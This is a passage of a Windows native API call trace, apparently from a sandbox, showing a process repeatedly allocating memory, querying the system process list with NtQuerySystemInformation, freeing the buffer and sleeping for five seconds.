ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.124] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.124] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.127] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.132] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.132] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.141] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.141] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.147] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.148] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.155] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.164] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.171] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.173] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.173] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.178] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.180] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.180] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.187] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.189] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.189] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.190] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.196] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.196] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.198] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.200] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.200] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.205] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.206] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.207] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.209] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.215] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.224] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.234] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.237] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.241] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.243] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.251] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.258] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.259] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.260] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.267] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.271] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.277] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.288] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0265.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0265.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0265.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0265.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0265.297] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0265.298] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0265.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 